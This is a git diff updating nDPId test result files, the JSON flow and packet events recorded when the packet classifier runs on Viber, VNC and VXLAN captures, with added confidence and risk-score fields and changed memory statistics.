-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155639234,"flow_last_seen":1527155639237,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00587{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155679410,"flow_last_seen":1527155685132,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155648481,"flow_last_seen":1527155648506,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155639234,"flow_last_seen":1527155639237,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155679410,"flow_last_seen":1527155685132,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00566{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155679410,"flow_last_seen":1527155685132,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155641813,"flow_last_seen":1527155641840,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155641813,"flow_last_seen":1527155641840,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","total-events-serialized":164}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 424/420
@@ -170,9 +170,9 @@
 ~~ total active/idle flows...: 26/26
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4734796 bytes
-~~ total memory freed........: 4734796 bytes
-~~ total allocations/frees...: 100105/100105
+~~ total memory allocated....: 4810541 bytes
+~~ total memory freed........: 4810541 bytes
+~~ total allocations/frees...: 101695/101695
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
 ~~ json string max len.......: 2400 chars
diff --git a/test/results/vnc.pcap.out b/test/results/vnc.pcap.out
index 9cafaed40..1968c9a7f 100644
--- a/test/results/vnc.pcap.out
+++ b/test/results/vnc.pcap.out
@@ -3,14 +3,14 @@
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1476111264364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1476111264364,"pkt":"EP7tAkntxOodxQGGCABFAAA0Xs1AAHQGVCNf7TDQwKgCbumPGvTqxTBkAAAAAIACIADbnAAAAgQFrAEDAwIBAQQC"}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1476111264364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1476111264364,"pkt":"xOodxQGGEP7tAkntCABFAAA0fFNAAIAGAADAqAJuX+0w0Br06Y8QfmeF6sUwZYASIABT+gAAAgQFtAEDAwgBAQQC"}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1476111264402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1476111264402,"pkt":"EP7tAkntxOodxQGGCABFAAAoXs5AAHQGVC5f7TDQwKgCbumPGvTqxTBlEH5nhlAQQTqDEwAAAAAAAAAA"}
-00699{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111264364,"flow_last_seen":1476111264453,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1476111264453,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","30":"Desktop\/File Sharing Session"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
+00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111264364,"flow_last_seen":1476111264453,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1476111264453,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3544,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1476111286462,"flow_last_seen":1476111286462,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1476111286462,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3544,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1476111286462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1476111286462,"pkt":"EP7tAkntxOodxQGGCABFAAA0be5AAHQGRQJf7TDQwKgCbslnGvTjPDftAAAAAIACIAD7xAAAAgQFrAEDAwIBAQQC"}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3545,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1476111286462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1476111286462,"pkt":"xOodxQGGEP7tAkntCABFAAA0AmNAAIAGAADAqAJuX+0w0Br0yWdPW3mt4zw37oASIABT+gAAAgQFtAEDAwgBAQQC"}
 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3546,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1476111286499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1476111286499,"pkt":"EP7tAkntxOodxQGGCABFAAAobe9AAHQGRQ1f7TDQwKgCbslnGvTjPDfuT1t5rlAQQTpSNgAAAAAAAAAA"}
-00702{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3548,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111286462,"flow_last_seen":1476111286549,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1476111286549,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","30":"Desktop\/File Sharing Session"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
-00748{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1008,"flow_first_seen":1476111286462,"flow_last_seen":1476111290613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":17966,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","30":"Desktop\/File Sharing Session"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
-00747{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":3543,"flow_first_seen":1476111264364,"flow_last_seen":1476111280884,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":64300,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","30":"Desktop\/File Sharing Session"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
+00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3548,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111286462,"flow_last_seen":1476111286549,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1476111286549,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
+00939{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1008,"flow_first_seen":1476111286462,"flow_last_seen":1476111290613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":17966,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
+00938{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":3543,"flow_first_seen":1476111264364,"flow_last_seen":1476111280884,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":64300,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
 00154{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","total-events-serialized":14}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 4551/4551
@@ -20,10 +20,10 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4732104 bytes
-~~ total memory freed........: 4732104 bytes
-~~ total allocations/frees...: 104109/104109
+~~ total memory allocated....: 4816729 bytes
+~~ total memory freed........: 4816729 bytes
+~~ total allocations/frees...: 105699/105699
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 159 chars
-~~ json string max len.......: 753 chars
-~~ json string avg len.......: 522 chars
+~~ json string max len.......: 944 chars
+~~ json string avg len.......: 618 chars
diff --git a/test/results/vxlan.pcap.out b/test/results/vxlan.pcap.out
new file mode 100644
index 000000000..af8551272
--- /dev/null
+++ b/test/results/vxlan.pcap.out
@@ -0,0 +1,67 @@
+00437{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"vxlan.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
+00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442645,"flow_last_seen":1639650442645,"flow_idle_time":180000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1639650442645,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60887,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639650442645,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":126,"pkt_l4_len":88,"ts_msec":1639650442645,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAbAM\/AABAEcnowKgWBMCoFgXt1xK1AFhqBAgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA6NbBAAEAR1uUKChQECAgICK2VADUAJhfikMYBAAABAAAAAAAACGZhY2Vib29rA2NvbQAAAQAB"}
+00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442645,"flow_last_seen":1639650442645,"flow_idle_time":180000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1639650442645,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60887,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}}
+00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639650442645,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":126,"pkt_l4_len":88,"ts_msec":1639650442645,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAbANAAABAEcnnwKgWBMCoFgXt1xK1AFhqBAgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA6NbFAAEAR1uQKChQECAgICK2VADUAJoy+G88BAAABAAAAAAAACGZhY2Vib29rA2NvbQAAHAAB"}
+00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442682,"flow_last_seen":1639650442682,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1639650442682,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":43866,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1639650442682,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":142,"pkt_l4_len":104,"ts_msec":1639650442682,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAfK8cAABAER37wKgWBcCoFgSrWhK1AGit0wgAAAAABFcAHuppKm\/PZnpQqv+aCABFAABK7zAAAHgRJVUICAgICgoUBAA1rZUANljckMaBgAABAAEAAAAACGZhY2Vib29rA2NvbQAAAQABwAwAAQABAAAAPQAEnfDgIw=="}
+00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442682,"flow_last_seen":1639650442682,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1639650442682,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":43866,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}}
+00578{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1639650442711,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":154,"pkt_l4_len":116,"ts_msec":1639650442711,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAiK8kAABAER3nwKgWBcCoFgSrWhK1AHSt3wgAAAAABFcAHuppKm\/PZnpQqv+aCABFAABW18oAAHgRPK8ICAgICgoUBAA1rZUAQjV7G8+BgAABAAEAAAAACGZhY2Vib29rA2NvbQAAHAABwAwAHAABAAABLAAQKgMogPFlAIH6zrAMAAAl3g=="}
+00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442712,"flow_last_seen":1639650442712,"flow_idle_time":180000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"ts_msec":1639650442712,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":49762,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1639650442712,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":128,"pkt_l4_len":90,"ts_msec":1639650442712,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAbgNKAABAEcnbwKgWBMCoFgXCYhK1AFoDcQgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA8c1FAAEAGK0kKChQEnfDgI7CqAbtGa9PfAAAAAKAC\/Vy6qgAAAgQFggQCCAr1DDJLAAAAAAEDAwc="}
+00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442712,"flow_last_seen":1639650442712,"flow_idle_time":180000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"ts_msec":1639650442712,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":49762,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}}
+00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442720,"flow_last_seen":1639650442720,"flow_idle_time":180000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"ts_msec":1639650442720,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":60230,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1639650442720,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":128,"pkt_l4_len":90,"ts_msec":1639650442720,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAbq8mAABAER3\/wKgWBcCoFgTrRhK1AFqtxQgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAA8AABAAFcGh5Kd8OAjCgoUBAG7sKrMyr8yRmvT4KAS\/\/+p5QAAAgQFcAQCCApu3xNF9QwySwEDAwg="}
+00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442720,"flow_last_seen":1639650442720,"flow_idle_time":180000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"ts_msec":1639650442720,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":60230,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}}
+00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1639650442721,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":120,"pkt_l4_len":82,"ts_msec":1639650442721,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAZgNLAABAEcniwKgWBMCoFgXCYhK1AFIDeQgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA0c1JAAEAGK1AKChQEnfDgI7CqAbtGa9PgzMq\/M4AQAfvWagAAAQEICvUMMlRu3xNF"}
